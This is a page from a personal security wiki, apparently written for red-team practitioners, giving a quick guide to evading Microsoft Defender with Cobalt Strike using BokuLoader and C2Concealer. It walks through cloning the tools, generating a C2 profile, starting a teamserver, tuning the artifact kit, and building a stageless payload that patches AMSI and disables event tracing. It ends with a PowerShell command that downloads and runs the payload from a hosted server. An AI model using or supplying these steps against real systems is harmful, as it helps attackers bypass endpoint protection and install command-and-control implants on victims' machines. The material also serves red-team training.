AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page

Was this helpful?

  1. Offensive Cyberz
  2. Defense Evasion

Evading Defender with CobaltStrike

quick guide to evading Defender (as of 26 May 202)

PreviousDefense EvasionNextDisable AV

Last updated 2 years ago

Was this helpful?

The following guide is based off of BokuLoader and C2Concealer. BokuLoader utilizes Halo's Gate to perform direct syscalls, patches AmsiOpenSession to disable AMSI, and disables windows event tracing. For a more in depth guide on how Reflective DLLs work or how AMSI is disabled within this process I recommend Sektor7s Malware Development and Windows Evasion courses or OffSec's PEN-300 course.

To start clone both github projects mentioned earlier

git clone https://github.com/boku7/BokuLoader
git clone https://github.com/FortyNorthSecurity/C2concealer

You'll want to run C2concealer's install script and update the main.py script with the location of your CobaltStrike folder. With that information updated and C2Concealer installed, its time to generate your own profile. Keep in mind you should follow FortyNorthSecurity's guide for customizing the tool to your Op. 

C2concealer --hostname test.com --variant 1

If the profile fails to generate, run the script a couple more times.

Next start up your teamserver. 

./teamserver <IP> <password> <Path To C2concealer Generated Profile>

Now it's time to update the artifact kit to set the stagesize to 412256. Update this in build.sh and dist-template/artifact.cna

Now its time to load the dist-template/artifact.cna and BokuLoader.cna aggressor scripts in CobaltStrike.

Now generate your x64 stageless payload (Attacks -> Packages -> Windows Executable (S)). A successful payload generation should look something like this in your script console:

Now it's time to deliver the payload to the target, in this example we used hosted file to drop the payload on disk and run the exe. (Attacks -> Web Drive-by -> Host File)

If you're just testing this, make sure to disable Tamper Protection, Automatic Sample Submission, and Cloud Delivered Protection.

download and execute the payload in whatever manner you want, we choose to use powershell. 

 iwr -uri http://10.10.100.100/download/file.exe -outfile file.exe
 .\file.exe
build.sh
dist-template/artifact.cna
Successful generation
PROFIT